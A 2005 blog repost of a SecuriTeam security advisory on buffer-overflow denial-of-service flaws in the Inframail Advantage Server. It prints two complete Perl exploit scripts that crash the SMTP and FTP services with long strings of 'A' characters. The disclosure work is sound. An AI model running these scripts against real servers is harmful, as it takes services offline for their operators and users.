Search This Blog

Thursday, June 30, 2005

[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Infradig Systems Inframail Advantage Server Multiple DoS
------------------------------------------------------------------------

SUMMARY

<http://www.infradig.com/> Infradig servers are "servers that support
SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
mailing-lists, calendars and document sharing".

Lack of proper command filtering allows attackers to send a long string as
a command which in turn will cause a buffer overflow that will in turn
crash the Infradig server.

DETAILS

Vulnerable Systems:
* Infradig Systems Advantage Server Edition version 6.37

Immune Systems:
* Infradig Systems Advantage Server Edition version 7.2

The commands SMTP MAIL FROM: and FTP NLST vulnerable for buffer overflow.
Issuing the character 'A' 40960 times as an argument to MAIL FROM: command
will cause the ifmail.exe process to die and re-launch.

Issuing the character 'A' roughly 102400 times to the NLST command and
then issuing the character 'A' roughly 102400 times to the NLST command
again will cause all processes running under the ifmailsvc.exe process to
die and re-launch (these processes include slapd.exe, slurpd.exe,
ifmail.exe, ifweb.exe and otheres).

Vendor Status:
The vendor has released a patch for Infradig Systems Advantage Server
Edition.

Exploit:
Inframail_SMTPOverflow.pl
#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
# Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill Inframail SMTP server at
$ARGV[0]:25...";

sleep(1);

print $socket "HELO moto.com\r\n";

sleep(1);

print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}

# EOF

Inframail_FTPOverflow.pl
#
# Usage: Inframail_FTPOverflow.pl <ip>
# Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

sleep(1);

print $socket "USER hello\r\n";

sleep(1);

print $socket "PASS moto\r\n";

sleep(1);

print $socket "NLST " . "A" x 102400 . "\r\n";

sleep(1);

print $socket "NLST " . "A" x 102400 . "\r\n";

close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}

#EOF

ADDITIONAL INFORMATION

The information has been provided by <mailto:reedarvin@gmail.com> Reed
Arvin.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: